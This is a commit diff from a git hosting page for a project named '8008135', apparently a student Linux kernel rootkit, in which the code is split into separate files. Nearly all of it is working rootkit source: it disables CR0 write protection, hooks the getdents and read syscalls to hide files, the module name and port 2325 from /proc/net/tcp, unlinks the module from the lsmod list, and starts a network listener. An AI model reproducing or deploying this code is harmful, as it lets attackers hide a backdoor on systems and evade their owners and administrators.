valentin_lechner/8008135
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

exporting functions to files

Browse Source
This commit is contained in:
valentin_lechner 2019-12-08 01:10:48 +00:00
parent bd0a37f68b
commit 500087d2ca
13 changed files with 398 additions and 154 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Makefile
View File

@ -20,6 +20,10 @@ obj-m += $(MNAME).o
# Core # Core
$(MNAME)-y += src/$(MNAME).o $(MNAME)-y += src/$(MNAME).o
$(MNAME)-y += src/50ck3t.o $(MNAME)-y += src/50ck3t.o
$(MNAME)-y += src/637d3n75.o
$(MNAME)-y += src/h1d3p0r7.o
$(MNAME)-y += src/h1d3m0dul3.o
$(MNAME)-y += src/p463unpr073c7.o
# Includes for header files etc # Includes for header files etc
ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H) ccflags-y := -I$(SRCS_H) -I$(LIBS_H) -I$(INCL_H)

72
src/637d3n75.c Normal file
View File

@ -0,0 +1,72 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "637d3n75.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
// remove this entry by copying everything after it forward
// and adjust the length reported
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}

165
src/8008135.c
View File

@ -17,167 +17,35 @@
* with this program. If not, see <http://www.gnu.org/licenses/>. * with this program. If not, see <http://www.gnu.org/licenses/>.
*/ */
/*******************************************************************************/
/**** includes ***************************************************************** /**** includes *****************************************************************
*******************************************************************************/ *******************************************************************************/
#include "8008135.h" #include "8008135.h"
#include "50ck3t.h" #include "50ck3t.h"
/**** var ******************************************************************** #include "637d3n75.h"
*******************************************************************************/ #include "h1d3m0dul3.h"
#include "h1d3p0r7.h"
sys_getdents_t sys_getdents_orig = NULL; #include "p463unpr073c7.h"
/*** FUNCTION ****************************************************************
* NAME: sys_getdents_new
* DESCRIPTION: function overriding the original getdents
* PARAMETERS: -
* RETURNS: -
*******************************************************************************/
asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count){
int boff;
struct linux_dirent* ent;
long ret = sys_getdents_orig(fd, dirent, count);
char* dbuf;
if (ret <= 0) {
return ret;
}
dbuf = (char*)dirent;
// go through the entries, looking for one that has our prefix
for (boff = 0; boff < ret;) {
ent = (struct linux_dirent*)(dbuf + boff);
// if it has hide prefix or module name anywhere, hide it
if ((strncmp(ent->d_name, HIDE_PREFIX, HIDE_PREFIX_SZ) == 0)
|| (strstr(ent->d_name, MODULE_NAME) != NULL)) {
#if defined DEBUG
printk("\n hide prefix or mod name contained!\n");
printk("\n ret %ld\n ", ret);
printk("\n dbuf %d\n" , dbuf);
printk("\n");
printk(ent->d_name);
#endif
// remove this entry by copying everything after it forward
// and adjust the length reported
#if defined DEBUG
printk("\n reclen %u \n", ent->d_reclen);
#endif
memcpy(dbuf + boff,
dbuf + boff + ent->d_reclen,
ret - (boff + ent->d_reclen));
ret -= ent->d_reclen;
#if defined DEBUG
printk("\n ret after change %ld\n ", ret);
#endif
} else {
// on to the next entry
boff += ent->d_reclen;
}
}
return ret;
}
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
read_ptr orig_read;
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*orig_read)(fd,buf,count);
if (result <= 0)
return result;
// get pathname
// CITATION [8] from report
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path,pbuf,256*sizeof(char));
// if virtual file /proc/net/tcp
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
// copy from user to kernelspace;
if (!access_ok(VERIFY_READ,buf,result))
return -1;
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
return -1;
if (copy_from_user(kbuf,buf,result))
return -1;
// filter out hidden ports
start_line = strchr(kbuf,':') - 4; // skip first line
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
end_line = strchr(start_line,'\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
memmove(start_line,end_line + 1, // delete line in file
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE,buf,result))
return EINVAL;
if (copy_to_user(buf,kbuf,result))
return EINVAL;
kfree(kbuf);
}
// return number of bytes read
return result;
}
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}
/*******************************************************************************/
/*** FUNCTION **************************************************************** /*** FUNCTION ****************************************************************
* NAME: 8008135_init * NAME: 8008135_init
* DESCRIPTION: initializing Kernel Module * DESCRIPTION: initializing Kernel Module - hijacking syscalltable
* PARAMETERS: - * PARAMETERS: -
* RETURNS: int * RETURNS: int
*******************************************************************************/ *******************************************************************************/
static int __init init_8008135(void) { static int __init init_8008135(void) {
printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table); printk(KERN_INFO "sys_call_table @ %p\n", sys_call_table);
// record the original getdents handler
sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM]; sys_getdents_orig = (sys_getdents_t)((void**)sys_call_table)[GETDENTS_SYSCALL_NUM];
printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig); printk(KERN_INFO "original sys_getdents @ %p\n", sys_getdents_orig);
// turn write protect off // turn write protect off
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG)); wprotectionoff();
// add our new handlers // add our new handlers
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new; sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_new;
@ -187,7 +55,7 @@ static int __init init_8008135(void) {
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read; sys_call_table[READ_SYSCALL_NUM] = (unsigned long) hacked_read;
// turn write protect back on // turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG); wprotectionon();
printk(KERN_INFO "New syscall in place\n"); printk(KERN_INFO "New syscall in place\n");
network_server_init(); network_server_init();
@ -205,16 +73,17 @@ static int __init init_8008135(void) {
*******************************************************************************/ *******************************************************************************/
static void __exit exit_8008135(void) { static void __exit exit_8008135(void) {
network_server_exit(); network_server_exit();
// allow us to write to read onlu pages wprotectionoff();
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
// set getdents handler back
sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig; sys_call_table[GETDENTS_SYSCALL_NUM] = sys_getdents_orig;
sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read; sys_call_table[READ_SYSCALL_NUM] = (unsigned long) orig_read;
// turn write protect back on // turn write protect back on
write_cr0(read_cr0() | WRITE_PROTECT_FLAG); wprotectionon();
printk(KERN_INFO "Old syscall back\n"); printk(KERN_INFO "Old syscall back\n");
} }
// Setting pointers to init-/exit-functions /*******************************************************************************/
module_init(init_8008135); module_init(init_8008135);
module_exit(exit_8008135); module_exit(exit_8008135);
/*******************************************************************************/

36
src/h1d3m0dul3.c Normal file
View File

@ -0,0 +1,36 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3m0dul3.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide_module
* DESCRIPTION: hides the module from lsmod
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void hide_module(void){
list_del(&THIS_MODULE->list);
}

91
src/h1d3p0r7.c Normal file
View File

@ -0,0 +1,91 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "h1d3p0r7.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: hide port
* DESCRIPTION: hides the port 2325
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
char *pathname, pbuf[256];
struct files_struct *current_files;
struct fdtable *files_table;
struct path file_path;
// run real read
result = (*orig_read)(fd,buf,count);
if (result <= 0)
return result;
// get pathname
// CITATION [8] from report
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path,pbuf,256*sizeof(char));
// if virtual file /proc/net/tcp
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
// copy from user to kernelspace;
if (!access_ok(VERIFY_READ,buf,result))
return -1;
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
return -1;
if (copy_from_user(kbuf,buf,result))
return -1;
// filter out hidden ports
start_line = strchr(kbuf,':') - 4; // skip first line
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
end_line = strchr(start_line,'\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
memmove(start_line,end_line + 1, // delete line in file
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE,buf,result))
return EINVAL;
if (copy_to_user(buf,kbuf,result))
return EINVAL;
kfree(kbuf);
}
// return number of bytes read
return result;
}

10
src/headers/50ck3t.h
View File

@ -16,8 +16,8 @@
* You should have received a copy of the GNU General Public License along * You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>. * with this program. If not, see <http://www.gnu.org/licenses/>.
*/ */
#ifndef SRC_HEADERS_50CK3T_H_ #ifndef SRC_HEADERS_50CK3T_H
#define SRC_HEADERS_50CK3T_H_ #define SRC_HEADERS_50CK3T_H
/**** includes ***************************************************************** /**** includes *****************************************************************
*******************************************************************************/ *******************************************************************************/
@ -40,11 +40,15 @@
#include <net/inet_connection_sock.h> #include <net/inet_connection_sock.h>
#include <net/request_sock.h> #include <net/request_sock.h>
/**** defines *****************************************************************
*******************************************************************************/
#define DEFAULT_PORT 2325 #define DEFAULT_PORT 2325
#define DEFAULT_PORT_HEX "0915"
#define MAX_CONNS 16 #define MAX_CONNS 16
#define MODULE_NAME "8008135" #define MODULE_NAME "8008135"
int network_server_init(void); int network_server_init(void);
void network_server_exit(void); void network_server_exit(void);
#endif /* SRC_HEADERS_50CK3T_H_ */ #endif

2
src/headers/5y563n.h Normal file
View File

@ -0,0 +1,2 @@
#pragma once
#include <linux/fs.h>

32
src/headers/637d3n75.h Normal file
View File

@ -0,0 +1,32 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_637d3n75_H
#define SRC_HEADERS_637d3n75_H
/**** var ********************************************************************
*******************************************************************************/
sys_getdents_t sys_getdents_orig = NULL;
extern asmlinkage long sys_getdents_new(unsigned int fd,
struct linux_dirent __user *dirent,
unsigned int count);
#endif

4
src/headers/8008135.h
View File

@ -42,14 +42,12 @@
#define GETDENTS_SYSCALL_NUM 78 #define GETDENTS_SYSCALL_NUM 78
#define READ_SYSCALL_NUM 0 #define READ_SYSCALL_NUM 0
#define WRITE_PROTECT_FLAG (1<<16)
#define HIDE_PREFIX "8008135." #define HIDE_PREFIX "8008135."
#define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1) #define HIDE_PREFIX_SZ (sizeof(HIDE_PREFIX) - 1)
#define MODULE_NAME "8008135" #define MODULE_NAME "8008135"
#define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1) #define MODULE_NAME_SZ (sizeof(MODULE_NAME) - 1)
#define HIDE_PORT "0915" // 2325 in Hexadecimal
/**** Modinfo **************************************************************** /**** Modinfo ****************************************************************
*******************************************************************************/ *******************************************************************************/
@ -73,4 +71,4 @@ typedef asmlinkage long (*sys_getdents_t)(unsigned int fd,
unsigned int count); unsigned int count);
typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf, typedef asmlinkage long (*read_ptr)(unsigned int fd, char __user *buf,
size_t count); size_t count);
#endif /* SRC_HEADERS_8008135_H */ #endif

26
src/headers/h1d3m0dul3.h Normal file
View File

@ -0,0 +1,26 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3m0dul3_H
#define SRC_HEADERS_h1d3m0dul3_H
extern void hide_module(void);
#endif

31
src/headers/h1d3p0r7.h Normal file
View File

@ -0,0 +1,31 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_h1d3p0r7_H
#define SRC_HEADERS_h1d3p0r7_H
#include "50ck3t.h"
/**** var **********************************************************************
*******************************************************************************/
read_ptr orig_read;
extern asmlinkage long hacked_read(unsigned int fd, char __user *buf,
size_t count)
#endif

31
src/headers/p463unpr073c7.h Normal file
View File

@ -0,0 +1,31 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef SRC_HEADERS_p463unpr073c7_H
#define SRC_HEADERS_p463unpr073c7_H
/**** defines *****************************************************************
*******************************************************************************/
#define WRITE_PROTECT_FLAG (1<<16)
extern void wprotectionoff(void);
extern void wprotectionon(void);
#endif

48
src/p463unpr073c7.c Normal file
View File

@ -0,0 +1,48 @@
/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
/*
* main.c
* Copyright (C) 2019
*
* 8008135 is free software: you can redistribute it and/or modify it
* under the terms of the GNU General Public License as published by the
* Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* 8008135 is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/*******************************************************************************/
/**** includes *****************************************************************
*******************************************************************************/
#include "p463unpr073c7.h"
/*******************************************************************************/
/*** FUNCTION ****************************************************************
* NAME: wprotectionoff
* DESCRIPTION: turn page write protection off
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionoff(void){
write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
}
/*** FUNCTION ****************************************************************
* NAME: wprotectionon
* DESCRIPTION: turn page write protection on
* PARAMETERS: -
* RETURNS:
*******************************************************************************/
void wprotectionon(void){
write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
}